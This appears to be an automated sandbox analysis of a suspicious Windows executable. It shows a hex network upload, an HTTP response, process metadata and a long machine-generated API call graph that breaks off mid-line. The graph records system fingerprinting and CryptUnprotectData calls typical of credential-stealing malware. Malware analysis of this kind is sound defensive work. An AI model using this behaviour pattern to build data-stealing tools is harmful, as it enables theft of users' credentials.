                                                    2024-04-25 11:33:06 UTC15331OUTData Raw: b4 45 ba ff 3f 40 99 7d ae f5 a8 d0 18 a4 9b 33 36 f4 f6 3f dd 3e 0e 1b df 05 75 0b b2 f9 e7 aa ef 1f be 25 41 d8 6e 14 c0 ed 85 c8 fc 50 c6 9e e8 a1 d8 7c 23 3b 14 0c 87 d9 ee de 66 e9 cf 59 b7 7e 06 d7 87 f0 72 a7 b0 ec 82 ec a3 fb a5 99 b7 1a d4 6c 4e 23 6b 1b e3 be bf f4 cd f1 52 00 7b f0 9c 80 c8 aa c5 18 a9 93 4e be dc 0f cd ae 0e b2 b4 a2 09 0b 7e b2 38 e7 f1 57 f3 db 00 3f 81 f8 6b 84 18 84 0b c6 6d fd 7a 76 69 34 49 84 e2 0b 99 3b e6 67 20 64 1e d6 8b ee 10 6c ca d2 3a 04 0e 5b a7 d7 d6 18 ad 06 a6 35 a1 4d 4b 31 fc f4 46 1e 8a b9 49 31 f7 3c cb 5a 4f fa 74 3d 8d 17 4c 6e a0 67 ec 40 d3 2f 61 8d 05 ca eb a4 5a d9 74 c5 fa 40 59 91 31 9d 37 ca 89 e1 de 52 cc 66 95 79 6f 57 c4 37 fd 56 a5 87 e2 39 0f ae f1 5b 00 76 2e 8a 10 bb a0 19 4d 03 34 23 9e
                                                    Data Ascii: E?@}36?>u%AnP|#;fY~rlN#kR{N~8W?kmzvi4I;g dl:[5MK1FI1<ZOt=Lng@/aZt@Y17RfyoW7V9[v.M4#
                                                    2024-04-25 11:33:07 UTC802INHTTP/1.1 200 OK
                                                    Date: Thu, 25 Apr 2024 11:33:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=50ln59vv6c451jqb0b7o3uieh8; expires=Mon, 19-Aug-2024 05:19:46 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3duRWCU1K66bvLCxSUAGdFj%2FyLLjNe4mBk8WvYerPkrpTK607epM1H5VYDJPyrobxPZrj9JDnjCw5x7Qi1h3pSrcr4bt%2B1sf7KaTYCTpkPdheQDonSCUqwiIiKDxlTyjIR72GXwkBY2p"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 879e042b1beb1375-ATL
                                                    alt-svc: h3=":443"; ma=86400


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Target ID:0
                                                    Start time:13:32:56
                                                    Start date:25/04/2024
                                                    Path:C:\Users\user\Desktop\file.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                    Imagebase:0xcd0000
                                                    File size:5'745'152 bytes
                                                    MD5 hash:C91F9C9FFA73CD9D586D34F73BEEE0CD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:12.9%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:10.5%
                                                      Total number of Nodes:712
                                                      Total number of Limit Nodes:19
                                                      execution_graph 16559 d06cd4 16561 d06ce5 16559->16561 16560 d06d74 RtlAllocateHeap 16561->16560 16561->16561 16562 d01dd5 16565 d08070 16562->16565 16564 d01e03 GetVolumeInformationW 16801 ce4848 16803 ce484e 16801->16803 16802 ce490e 16803->16802 16804 d03cc0 LdrInitializeThunk 16803->16804 16805 ce4936 16804->16805 16806 ce4c49 16807 ce4c4f 16806->16807 16808 d03cc0 LdrInitializeThunk 16807->16808 16809 ce5981 16808->16809 16566 ce4bc0 16575 d03b50 16566->16575 16568 ce4bcd 16578 d09000 16568->16578 16571 d03b50 RtlAllocateHeap 16572 ce4bed 16571->16572 16573 d09000 LdrInitializeThunk 16572->16573 16574 ce4bff 16573->16574 16576 d03be4 RtlAllocateHeap 16575->16576 16577 d03ba6 16575->16577 16576->16568 16577->16576 16579 d0904d 16578->16579 16582 d090ae 16579->16582 16584 d03cc0 16579->16584 16580 ce4bdd 16580->16571 16582->16580 16583 d03cc0 LdrInitializeThunk 16582->16583 16583->16580 16585 d03cf0 16584->16585 16586 d03ced LdrInitializeThunk 16584->16586 16585->16582 16586->16582 16815 d06041 16817 d0609d LoadLibraryW 16815->16817 16818 cf2458 16819 cf2470 16818->16819 16819->16819 16820 d03b50 RtlAllocateHeap 16819->16820 16821 cf255d 16820->16821 16821->16821 16822 d08ba0 2 API calls 16821->16822 16823 cf260d 16822->16823 16596 d057ca 16597 d05810 16596->16597 16597->16597 16598 d03cc0 LdrInitializeThunk 16597->16598 16599 d0586e 16597->16599 16598->16599 16600 d03cc0 LdrInitializeThunk 16599->16600 16600->16599 16601 cff4d3 16602 cff4ff 16601->16602 16603 d03b50 RtlAllocateHeap 16602->16603 16604 cff5b1 16603->16604 16605 d075cd 16606 d0764a RtlReAllocateHeap 16605->16606 16607 d0760b 16605->16607 16608 d07724 16606->16608 16607->16606 16824 ce4d51 16825 ce4d57 16824->16825 16826 d03b50 RtlAllocateHeap 16825->16826 16827 ce4e72 16826->16827 16828 d08ba0 2 API calls 16827->16828 16829 ce4eed 16828->16829 16609 cee5ec 16610 cee5fc 16609->16610 16613 d09500 16610->16613 16612 cee618 16614 d0954d 16613->16614 16615 d095ae 16614->16615 16617 d03cc0 LdrInitializeThunk 16614->16617 16616 d03b50 RtlAllocateHeap 16615->16616 16620 d0969e 16615->16620 16618 d095eb 16616->16618 16617->16615 16619 d03cc0 LdrInitializeThunk 16618->16619 16618->16620 16619->16620 16620->16612 16836 ce7160 16839 d02010 16836->16839 16838 ce716d 16840 d08ba0 2 API calls 16839->16840 16841 d0203d 16840->16841 16842 d02390 16841->16842 16843 d02244 16841->16843 16845 d03b50 RtlAllocateHeap 16841->16845 16847 d0211e 16841->16847 16842->16838 16843->16842 16849 d03cc0 LdrInitializeThunk 16843->16849 16850 d02066 16845->16850 16847->16842 16847->16843 16852 d04160 16847->16852 16856 d04010 16847->16856 16860 d04250 16847->16860 16849->16843 16850->16847 16851 d03cc0 LdrInitializeThunk 16850->16851 16851->16847 16853 d0421e 16852->16853 16854 d04176 16852->16854 16853->16847 16854->16853 16855 d03cc0 LdrInitializeThunk 16854->16855 16855->16853 16857 d0412e 16856->16857 16858 d04027 16856->16858 16857->16847 16858->16857 16858->16858 16859 d03cc0 LdrInitializeThunk 16858->16859 16859->16857 16861 d04458 16860->16861 16862 d0426b 16860->16862 16861->16847 16862->16861 16863 d0432e 16862->16863 16865 d03cc0 LdrInitializeThunk 16862->16865 16866 d0442e 16863->16866 16867 d03cc0 LdrInitializeThunk 16863->16867 16864 d04160 LdrInitializeThunk 16864->16861 16865->16863 16866->16861 16866->16864 16867->16866 16621 d059e2 16623 d05a3c 16621->16623 16622 d05a9e 16623->16622 16624 d03cc0 LdrInitializeThunk 16623->16624 16624->16622 16625 ce39fc 16630 cd97d0 16625->16630 16627 ce3a09 16628 cd97d0 2 API calls 16627->16628 16629 ce3a1d 16628->16629 16631 cd97e5 16630->16631 16635 cd9821 16630->16635 16636 d01cd0 16631->16636 16633 cd9895 16634 d03b50 RtlAllocateHeap 16633->16634 16634->16635 16635->16627 16637 d01d41 16636->16637 16638 d01d82 RtlExpandEnvironmentStrings 16636->16638 16637->16638 16639 d009e9 16640 d009ee 16639->16640 16641 d03b50 RtlAllocateHeap 16640->16641 16642 d009fc 16641->16642 16643 d09000 LdrInitializeThunk 16642->16643 16644 d00a26 16643->16644 16645 cea0f0 16646 cea0fe 16645->16646 16650 cea140 16645->16650 16647 d03b50 RtlAllocateHeap 16646->16647 16648 cea154 16647->16648 16648->16648 16651 cea200 16648->16651 16652 cea280 16651->16652 16653 d03b50 RtlAllocateHeap 16652->16653 16654 cea300 16653->16654 16654->16654 16657 d08d50 16654->16657 16656 cea371 16658 d08d70 16657->16658 16659 d03b50 RtlAllocateHeap 16658->16659 16660 d08d90 16659->16660 16661 d08ebe 16660->16661 16662 d03cc0 LdrInitializeThunk 16660->16662 16661->16656 16662->16661 16868 cee670 16869 d093a0 LdrInitializeThunk 16868->16869 16870 cee685 16869->16870 16663 cf4f8f 16664 cf4f96 16663->16664 16664->16664 16665 d01cd0 RtlExpandEnvironmentStrings 16664->16665 16666 cf506a 16665->16666 16667 cf50b5 GetPhysicallyInstalledSystemMemory 16666->16667 16668 cf50da 16667->16668 16668->16668 16669 d01690 16672 d08ba0 16669->16672 16671 d016c0 16673 d08bc0 16672->16673 16674 d03b50 RtlAllocateHeap 16673->16674 16676 d08be0 16674->16676 16675 d08d0e 16675->16671 16676->16675 16677 d03cc0 LdrInitializeThunk 16676->16677 16677->16675 16871 cfd608 16872 cfd60d 16871->16872 16873 cfd6b9 KiUserCallbackDispatcher 16872->16873 16874 cfd6cc 16873->16874 16875 ce3c09 16876 ce3c15 16875->16876 16877 cd97d0 2 API calls 16876->16877 16878 ce3c23 16877->16878 16682 cf4087 16683 cf4091 16682->16683 16684 cf44fe GetComputerNameExA 16683->16684 16686 cf456d GetComputerNameExA 16684->16686 16687 cf467b 16686->16687 16688 ce5087 16690 ce5090 16688->16690 16689 ce516e 16690->16689 16691 d03cc0 LdrInitializeThunk 16690->16691 16691->16689 16692 cf7f84 16694 cf801a 16692->16694 16693 cf8071 SysAllocString 16695 cf80cd 16693->16695 16694->16693 16879 cec900 16880 cec95f 16879->16880 16881 cec90b 16879->16881 16882 d03b50 RtlAllocateHeap 16881->16882 16883 cec96e 16882->16883 16884 d03b50 RtlAllocateHeap 16883->16884 16884->16880 16885 d05f1f 16887 d05f2a 16885->16887 16886 d06000 LoadLibraryW 16888 d06007 16886->16888 16887->16886 16889 d2da02 16890 d2da0d __DllMainCRTStartup@12 16889->16890 16893 d2d90c 16890->16893 16892 d2da20 16894 d2d918 __close 16893->16894 16897 d2d965 16894->16897 16899 d2d9b5 __close 16894->16899 16901 d2d7d7 16894->16901 16896 d2d995 16898 d2d7d7 ___DllMainCRTStartup 16 API calls 16896->16898 16896->16899 16897->16896 16897->16899 16900 d2d7d7 ___DllMainCRTStartup 16 API calls 16897->16900 16898->16899 16899->16892 16900->16896 16902 d2d862 16901->16902 16910 d2d7e6 ___DllMainCRTStartup 16901->16910 16903 d2d868 16902->16903 16904 d2d899 16902->16904 16908 d2d7f1 16903->16908 16909 d2d883 16903->16909 16962 d315e2 16903->16962 16905 d2d8f7 16904->16905 16906 d2d89e 16904->16906 16905->16908 16998 d2ee8a 16905->16998 16975 d2eb70 TlsGetValue 16906->16975 16908->16897 16909->16908 16965 d31893 16909->16965 16910->16908 16932 d2eef8 16910->16932 16917 d2d7fd 16925 d2d808 __RTC_Initialize ___DllMainCRTStartup 16917->16925 16957 d31dc7 16917->16957 16918 d2d8af 16918->16908 16983 d2eaf5 TlsGetValue 16918->16983 16919 d2d88d 16969 d2eba4 16919->16969 16922 d2d892 16924 d31dc7 ___DllMainCRTStartup HeapFree 16922->16924 16924->16908 16925->16897 16926 d2d8cd 16927 d2d8d4 16926->16927 16928 d2d8eb 16926->16928 16987 d2ebe1 16927->16987 16992 d2dfe4 16928->16992 16931 d2d8db 16931->16897 16935 d2ef08 ___DllMainCRTStartup 16932->16935 16933 d2f07b 16934 d2eba4 __mtterm 3 API calls 16933->16934 16956 d2f068 ___DllMainCRTStartup 16934->16956 16935->16933 16936 d2efb4 TlsSetValue 16935->16936 16935->16956 16937 d2efc5 16936->16937 16936->16956 17009 d315f1 16937->17009 16941 d2efd5 16942 d2ea7a __onexit_nolock 2 API calls 16941->16942 16943 d2efe5 16942->16943 16944 d2ea7a __onexit_nolock 2 API calls 16943->16944 16945 d2eff5 16944->16945 16946 d2ea7a __onexit_nolock 2 API calls 16945->16946 16947 d2f005 ___DllMainCRTStartup 16946->16947 16947->16933 16948 d2eaf5 __freeptd 2 API calls 16947->16948 16949 d2f026 16948->16949 16949->16933 16950 d31292 ___DllMainCRTStartup 6 API calls 16949->16950 16951 d2f03f 16950->16951 16951->16933 16952 d2eaf5 __freeptd 2 API calls 16951->16952 16953 d2f059 16952->16953 16953->16933 16954 d2f060 16953->16954 16955 d2ebe1 ___DllMainCRTStartup 5 API calls 16954->16955 16955->16956 16956->16917 16958 d31dd0 16957->16958 16959 d31e27 16957->16959 16960 d31de2 16958->16960 16961 d31e15 HeapFree 16958->16961 16959->16908 16960->16908 16961->16959 17026 d314a0 16962->17026 16964 d315ed 16964->16909 16968 d3189c 16965->16968 16966 d318b0 16966->16919 16967 d2dfe4 __fclose_nolock 5 API calls 16967->16968 16968->16966 16968->16967 16970 d2ebba 16969->16970 16971 d2ebae 16969->16971 16973 d2ebce TlsFree 16970->16973 16974 d2ebdc 16970->16974 16972 d2eaf5 __freeptd 2 API calls 16971->16972 16972->16970 16973->16974 16974->16922 16976 d2d8a3 16975->16976 16977 d2eb85 16975->16977 16980 d31292 16976->16980 16978 d2eaf5 __freeptd 2 API calls 16977->16978 16979 d2eb90 TlsSetValue 16978->16979 16979->16976 17120 d35fe9 16980->17120 16982 d312a8 16982->16918 16984 d2eb0d 16983->16984 16986 d2eb22 16983->16986 16985 d2eb17 TlsGetValue 16984->16985 16984->16986 16985->16986 16986->16926 16988 d2ebed __close ___DllMainCRTStartup 16987->16988 16989 d3334e _flsall 5 API calls 16988->16989 16990 d2ec1b 16988->16990 16991 d2ec5e 16989->16991 16990->16931 16991->16931 16994 d2dff0 __close 16992->16994 16993 d2e056 strtoxl __close 16993->16908 16994->16993 16996 d3334e _flsall 4 API calls 16994->16996 16997 d2e007 ___sbh_free_block ___sbh_find_block __fclose_nolock 16994->16997 16995 d2e044 HeapFree 16995->16993 16996->16997 16997->16993 16997->16995 16999 d2eee3 16998->16999 17000 d2ee98 16998->17000 17002 d2eef6 16999->17002 17003 d2eeed TlsSetValue 16999->17003 17001 d2ee9e TlsGetValue 17000->17001 17006 d2eec1 17000->17006 17004 d2eeb1 TlsGetValue 17001->17004 17001->17006 17002->16908 17003->17002 17004->17006 17005 d2eaf5 __freeptd 2 API calls 17007 d2eed8 17005->17007 17006->17005 17130 d2ed5b 17007->17130 17020 d2eaec 17009->17020 17011 d315f9 __init_pointers __initp_misc_winsig 17023 d2f634 17011->17023 17014 d2ea7a __onexit_nolock 2 API calls 17015 d2efca 17014->17015 17016 d2ea7a TlsGetValue 17015->17016 17017 d2ea92 17016->17017 17019 d2eaa7 17016->17019 17018 d2ea9c TlsGetValue 17017->17018 17017->17019 17018->17019 17019->16941 17021 d2ea7a __onexit_nolock 2 API calls 17020->17021 17022 d2eaf3 17021->17022 17022->17011 17024 d2ea7a __onexit_nolock 2 API calls 17023->17024 17025 d2f63e 17024->17025 17025->17014 17027 d314ac __close 17026->17027 17037 d3334e 17027->17037 17029 d314b3 17030 d2eaf5 __freeptd 2 API calls 17029->17030 17032 d3156c _doexit __close __initterm 17029->17032 17031 d314ea 17030->17031 17031->17032 17033 d2eaf5 __freeptd 2 API calls 17031->17033 17032->16964 17035 d314ff 17033->17035 17034 d2eaec TlsGetValue TlsGetValue FindHandlerForForeignException 17034->17035 17035->17032 17035->17034 17036 d2eaf5 TlsGetValue TlsGetValue __freeptd 17035->17036 17036->17035 17038 d33363 17037->17038 17039 d33375 17037->17039 17043 d3328b 17038->17043 17039->17029 17041 d33369 17041->17039 17058 d3135c 17041->17058 17044 d33297 __close 17043->17044 17050 d332b3 _doexit 17044->17050 17065 d3465d 17044->17065 17049 d332d8 17051 d3334e _flsall 5 API calls 17049->17051 17057 d332cd strtoxl __close __mtinitlocknum 17049->17057 17050->17057 17083 d3124d 17050->17083 17052 d332f5 17051->17052 17053 d33329 17052->17053 17055 d332fd ___lock_fhandle 17052->17055 17054 d2dfe4 __fclose_nolock 5 API calls 17053->17054 17054->17057 17056 d2dfe4 __fclose_nolock 5 API calls 17055->17056 17055->17057 17056->17057 17057->17041 17059 d3465d __FF_MSGBANNER 2 API calls 17058->17059 17060 d31366 17059->17060 17061 d344b2 __NMSG_WRITE 2 API calls 17060->17061 17062 d3136e 17061->17062 17063 d2eaf5 __freeptd 2 API calls 17062->17063 17064 d31379 17063->17064 17064->17039 17086 d36904 17065->17086 17068 d34671 17070 d344b2 __NMSG_WRITE 2 API calls 17068->17070 17072 d332ac 17068->17072 17069 d36904 __set_error_mode 2 API calls 17069->17068 17071 d34689 17070->17071 17073 d344b2 __NMSG_WRITE 2 API calls 17071->17073 17074 d344b2 17072->17074 17073->17072 17075 d344c6 17074->17075 17076 d36904 __set_error_mode 2 API calls 17075->17076 17078 d34626 17075->17078 17077 d344e8 17076->17077 17077->17078 17079 d36904 __set_error_mode 2 API calls 17077->17079 17078->17050 17080 d344f9 17079->17080 17080->17078 17093 d2d07c 17080->17093 17082 d3452d __invoke_watson 17082->17050 17097 d2f4af 17083->17097 17085 d3125e 17085->17049 17088 d36913 strtoxl 17086->17088 17087 d34664 17087->17068 17087->17069 17088->17087 17090 d2f271 17088->17090 17091 d2eaf5 __freeptd 2 API calls 17090->17091 17092 d2f281 __write_nolock 17091->17092 17096 d2d08d strtoxl 17093->17096 17094 d2f271 strtoxl 2 API calls 17095 d2d0a8 17094->17095 17095->17082 17096->17094 17096->17095 17098 d2f562 17097->17098 17102 d2f4c1 _doexit 17097->17102 17099 d2f588 _malloc 2 API calls 17098->17099 17100 d2f54e strtoxl 17099->17100 17100->17085 17101 d3465d __FF_MSGBANNER 2 API calls 17101->17102 17102->17100 17102->17101 17103 d344b2 __NMSG_WRITE 2 API calls 17102->17103 17105 d2f51e RtlAllocateHeap 17102->17105 17107 d2f460 17102->17107 17113 d2f588 17102->17113 17103->17102 17105->17102 17108 d2f46c __close 17107->17108 17109 d3334e _flsall 5 API calls 17108->17109 17110 d2f48d __close _malloc 17108->17110 17111 d2f482 17109->17111 17110->17102 17116 d33b60 17111->17116 17114 d2eaf5 __freeptd 2 API calls 17113->17114 17115 d2f598 17114->17115 17115->17102 17117 d33b8e 17116->17117 17118 d33c27 ___sbh_alloc_block 17117->17118 17119 d336c7 ___sbh_alloc_block RtlAllocateHeap 17117->17119 17118->17110 17119->17118 17121 d35ff5 __close 17120->17121 17122 d3600d strtoxl 17121->17122 17129 d3602c _memset __calloc_impl 17121->17129 17123 d2f271 strtoxl 2 API calls 17122->17123 17126 d36022 __close 17123->17126 17124 d3609e RtlAllocateHeap 17124->17129 17125 d3334e _flsall 5 API calls 17125->17129 17126->16982 17127 d2f588 _malloc 2 API calls 17127->17129 17128 d33b60 ___sbh_alloc_block RtlAllocateHeap 17128->17129 17129->17124 17129->17125 17129->17126 17129->17127 17129->17128 17131 d2ed67 __close 17130->17131 17132 d2ee69 __close 17131->17132 17133 d2dfe4 __fclose_nolock 5 API calls 17131->17133 17134 d2ed7f 17131->17134 17132->16999 17133->17134 17135 d2dfe4 __fclose_nolock 5 API calls 17134->17135 17139 d2ed8d 17134->17139 17135->17139 17136 d2dfe4 __fclose_nolock 5 API calls 17137 d2ed9b 17136->17137 17138 d2eda9 17137->17138 17140 d2dfe4 __fclose_nolock 5 API calls 17137->17140 17141 d2edb7 17138->17141 17142 d2dfe4 __fclose_nolock 5 API calls 17138->17142 17139->17136 17139->17137 17140->17138 17143 d2edc5 17141->17143 17145 d2dfe4 __fclose_nolock 5 API calls 17141->17145 17142->17141 17144 d2edd3 17143->17144 17146 d2dfe4 __fclose_nolock 5 API calls 17143->17146 17147 d2ede4 17144->17147 17148 d2dfe4 __fclose_nolock 5 API calls 17144->17148 17145->17143 17146->17144 17149 d3334e _flsall 5 API calls 17147->17149 17148->17147 17151 d2edec __freefls@4 17149->17151 17150 d2edf8 __freefls@4 17150->16999 17151->17150 17152 d3334e _flsall 5 API calls 17151->17152 17155 d2ee25 __freefls@4 17152->17155 17153 d2ee56 __freefls@4 17154 d2dfe4 __fclose_nolock 5 API calls 17153->17154 17154->17132 17155->17153 17157 d2e755 17155->17157 17158 d2e7d9 17157->17158 17162 d2e76c 17157->17162 17159 d2e826 17158->17159 17160 d2dfe4 __fclose_nolock 5 API calls 17158->17160 17172 d2e84d 17159->17172 17211 d34041 17159->17211 17164 d2e7fa 17160->17164 17161 d2e7a0 17166 d2e7c1 17161->17166 17177 d2dfe4 __fclose_nolock 5 API calls 17161->17177 17162->17158 17162->17161 17170 d2dfe4 __fclose_nolock 5 API calls 17162->17170 17167 d2dfe4 __fclose_nolock 5 API calls 17164->17167 17168 d2dfe4 __fclose_nolock 5 API calls 17166->17168 17173 d2e80d 17167->17173 17174 d2e7ce 17168->17174 17169 d2e892 17175 d2dfe4 __fclose_nolock 5 API calls 17169->17175 17176 d2e795 17170->17176 17171 d2dfe4 __fclose_nolock 5 API calls 17171->17172 17172->17169 17178 d2dfe4 5 API calls __fclose_nolock 17172->17178 17179 d2dfe4 __fclose_nolock 5 API calls 17173->17179 17180 d2dfe4 __fclose_nolock 5 API calls 17174->17180 17181 d2e898 17175->17181 17187 d3421b 17176->17187 17183 d2e7b6 17177->17183 17178->17172 17184 d2e81b 17179->17184 17180->17158 17181->17153 17203 d341d6 17183->17203 17186 d2dfe4 __fclose_nolock 5 API calls 17184->17186 17186->17159 17188 d34228 17187->17188 17202 d342a5 17187->17202 17189 d34239 17188->17189 17190 d2dfe4 __fclose_nolock 5 API calls 17188->17190 17191 d3424b 17189->17191 17193 d2dfe4 __fclose_nolock 5 API calls 17189->17193 17190->17189 17192 d3425d 17191->17192 17194 d2dfe4 __fclose_nolock 5 API calls 17191->17194 17195 d2dfe4 __fclose_nolock 5 API calls 17192->17195 17196 d3426f 17192->17196 17193->17191 17194->17192 17195->17196 17197 d2dfe4 __fclose_nolock 5 API calls 17196->17197 17199 d34281 17196->17199 17197->17199 17198 d34293 17201 d2dfe4 __fclose_nolock 5 API calls 17198->17201 17198->17202 17199->17198 17200 d2dfe4 __fclose_nolock 5 API calls 17199->17200 17200->17198 17201->17202 17202->17161 17204 d341e3 17203->17204 17210 d34217 17203->17210 17205 d341f3 17204->17205 17206 d2dfe4 __fclose_nolock 5 API calls 17204->17206 17207 d34205 17205->17207 17208 d2dfe4 __fclose_nolock 5 API calls 17205->17208 17206->17205 17209 d2dfe4 __fclose_nolock 5 API calls 17207->17209 17207->17210 17208->17207 17209->17210 17210->17166 17212 d2e846 17211->17212 17213 d34052 17211->17213 17212->17171 17214 d2dfe4 __fclose_nolock 5 API calls 17213->17214 17215 d3405a 17214->17215 17216 d2dfe4 __fclose_nolock 5 API calls 17215->17216 17217 d34062 17216->17217 17218 d2dfe4 __fclose_nolock 5 API calls 17217->17218 17219 d3406a 17218->17219 17220 d2dfe4 __fclose_nolock 5 API calls 17219->17220 17221 d34072 17220->17221 17222 d2dfe4 __fclose_nolock 5 API calls 17221->17222 17223 d3407a 17222->17223 17224 d2dfe4 __fclose_nolock 5 API calls 17223->17224 17225 d34082 17224->17225 17226 d2dfe4 __fclose_nolock 5 API calls 17225->17226 17227 d34089 17226->17227 17228 d2dfe4 __fclose_nolock 5 API calls 17227->17228 17229 d34091 17228->17229 17230 d2dfe4 __fclose_nolock 5 API calls 17229->17230 17231 d34099 17230->17231 17232 d2dfe4 __fclose_nolock 5 API calls 17231->17232 17233 d340a1 17232->17233 17234 d2dfe4 __fclose_nolock 5 API calls 17233->17234 17235 d340a9 17234->17235 17236 d2dfe4 __fclose_nolock 5 API calls 17235->17236 17237 d340b1 17236->17237 17238 d2dfe4 __fclose_nolock 5 API calls 17237->17238 17239 d340b9 17238->17239 17240 d2dfe4 __fclose_nolock 5 API calls 17239->17240 17241 d340c1 17240->17241 17242 d2dfe4 __fclose_nolock 5 API calls 17241->17242 17243 d340c9 17242->17243 17244 d2dfe4 __fclose_nolock 5 API calls 17243->17244 17245 d340d1 17244->17245 17246 d2dfe4 __fclose_nolock 5 API calls 17245->17246 17247 d340dc 17246->17247 17248 d2dfe4 __fclose_nolock 5 API calls 17247->17248 17249 d340e4 17248->17249 17250 d2dfe4 __fclose_nolock 5 API calls 17249->17250 17251 d340ec 17250->17251 17252 d2dfe4 __fclose_nolock 5 API calls 17251->17252 17253 d340f4 17252->17253 17254 d2dfe4 __fclose_nolock 5 API calls 17253->17254 17255 d340fc 17254->17255 17256 d2dfe4 __fclose_nolock 5 API calls 17255->17256 17257 d34104 17256->17257 17258 d2dfe4 __fclose_nolock 5 API calls 17257->17258 17259 d3410c 17258->17259 17260 d2dfe4 __fclose_nolock 5 API calls 17259->17260 17261 d34114 17260->17261 17262 d2dfe4 __fclose_nolock 5 API calls 17261->17262 17263 d3411c 17262->17263 17264 d2dfe4 __fclose_nolock 5 API calls 17263->17264 17265 d34124 17264->17265 17266 d2dfe4 __fclose_nolock 5 API calls 17265->17266 17267 d3412c 17266->17267 17268 d2dfe4 __fclose_nolock 5 API calls 17267->17268 17269 d34134 17268->17269 17270 d2dfe4 __fclose_nolock 5 API calls 17269->17270 17271 d3413c 17270->17271 17272 d2dfe4 __fclose_nolock 5 API calls 17271->17272 17273 d34144 17272->17273 17274 d2dfe4 __fclose_nolock 5 API calls 17273->17274 17275 d3414c 17274->17275 17276 d2dfe4 __fclose_nolock 5 API calls 17275->17276 17277 d34154 17276->17277 17278 d2dfe4 __fclose_nolock 5 API calls 17277->17278 17279 d34162 17278->17279 17280 d2dfe4 __fclose_nolock 5 API calls 17279->17280 17281 d3416d 17280->17281 17282 d2dfe4 __fclose_nolock 5 API calls 17281->17282 17283 d34178 17282->17283 17284 d2dfe4 __fclose_nolock 5 API calls 17283->17284 17285 d34183 17284->17285 17286 d2dfe4 __fclose_nolock 5 API calls 17285->17286 17287 d3418e 17286->17287 17288 d2dfe4 __fclose_nolock 5 API calls 17287->17288 17289 d34199 17288->17289 17290 d2dfe4 __fclose_nolock 5 API calls 17289->17290 17291 d341a4 17290->17291 17292 d2dfe4 __fclose_nolock 5 API calls 17291->17292 17293 d341af 17292->17293 17294 d2dfe4 __fclose_nolock 5 API calls 17293->17294 17295 d341ba 17294->17295 17296 d2dfe4 __fclose_nolock 5 API calls 17295->17296 17297 d341c5 17296->17297 17298 d2dfe4 __fclose_nolock 5 API calls 17297->17298 17298->17212 17299 ce1d1c 17300 ce1d2b 17299->17300 17305 ce4950 17300->17305 17302 ce1d3e 17303 cd97d0 RtlExpandEnvironmentStrings RtlAllocateHeap 17302->17303 17304 ce1d48 17303->17304 17306 ce4970 17305->17306 17306->17306 17307 ce497a RtlExpandEnvironmentStrings 17306->17307 17308 ce49ae 17307->17308 17309 d03b50 RtlAllocateHeap 17308->17309 17310 ce49be RtlExpandEnvironmentStrings 17309->17310 17311 ce4a4e 17310->17311 17312 d03b50 RtlAllocateHeap 17311->17312 17314 ce4ad7 17312->17314 17313 d08ba0 2 API calls 17315 ce4b5a 17313->17315 17314->17313 17314->17314 16696 ce5999 16697 ce59a8 16696->16697 16698 d03b50 RtlAllocateHeap 16697->16698 16700 ce5ad6 16698->16700 16699 ce5ce9 CryptUnprotectData 16700->16699 16701 ce5890 16702 d08d50 2 API calls 16701->16702 16703 ce5897 16702->16703 16704 d08d50 2 API calls 16703->16704 16705 ce58a1 16704->16705 16706 cec390 16707 cec395 16706->16707 16711 cec540 16707->16711 16727 cefe80 16707->16727 16708 cec3bf 16712 cec610 16711->16712 16713 cec556 16711->16713 16712->16708 16713->16712 16714 d03b50 RtlAllocateHeap 16713->16714 16715 cec682 16714->16715 16715->16715 16716 d08ba0 2 API calls 16715->16716 16717 cec6fd 16716->16717 16717->16712 16718 d03b50 RtlAllocateHeap 16717->16718 16719 cec70d 16718->16719 16720 d09000 LdrInitializeThunk 16719->16720 16721 cec71f 16720->16721 16722 d03b50 RtlAllocateHeap 16721->16722 16723 cec765 16721->16723 16724 cec77a 16722->16724 16723->16712 16725 d03cc0 LdrInitializeThunk 16723->16725 16724->16724 16731 cd8d90 16724->16731 16725->16712 16728 cf0000 16727->16728 16729 cefe99 16727->16729 16728->16708 16730 d03b50 RtlAllocateHeap 16729->16730 16730->16728 16732 cd8eb6 16731->16732 16734 cd8db0 16731->16734 16733 d03b50 RtlAllocateHeap 16732->16733 16736 cd8dfa 16733->16736 16735 d03b50 RtlAllocateHeap 16734->16735 16735->16736 16736->16723 17323 ce2129 17326 ce42f0 17323->17326 17325 ce2145 17327 ce4320 17326->17327 17328 d03b50 RtlAllocateHeap 17327->17328 17329 ce4340 17328->17329 17330 d03b50 RtlAllocateHeap 17329->17330 17331 ce43e0 17330->17331 17331->17325 16737 cef3a4 16740 d093a0 16737->16740 16742 d093c0 16740->16742 16741 cef3c7 16742->16741 16743 d03cc0 LdrInitializeThunk 16742->16743 16743->16741 16744 ce62a2 16747 ce7280 16744->16747 16748 ce7340 16747->16748 16748->16748 16749 d03b50 RtlAllocateHeap 16748->16749 16750 ce743e 16749->16750 16751 d03b50 RtlAllocateHeap 16750->16751 16752 ce764c 16751->16752 16753 ce46a3 16754 d03b50 RtlAllocateHeap 16753->16754 16755 ce46ad 16754->16755 16756 d09000 LdrInitializeThunk 16755->16756 16757 ce46bf 16756->16757 16758 ce06a0 16759 ce06af 16758->16759 16764 ce7810 16759->16764 16761 ce06c0 16762 cd97d0 RtlExpandEnvironmentStrings RtlAllocateHeap 16761->16762 16763 ce06ca 16762->16763 16765 ce7830 16764->16765 16765->16765 16766 ce783b RtlExpandEnvironmentStrings 16765->16766 16767 ce785c 16766->16767 16768 d03b50 RtlAllocateHeap 16767->16768 16769 ce786b RtlExpandEnvironmentStrings 16768->16769 16770 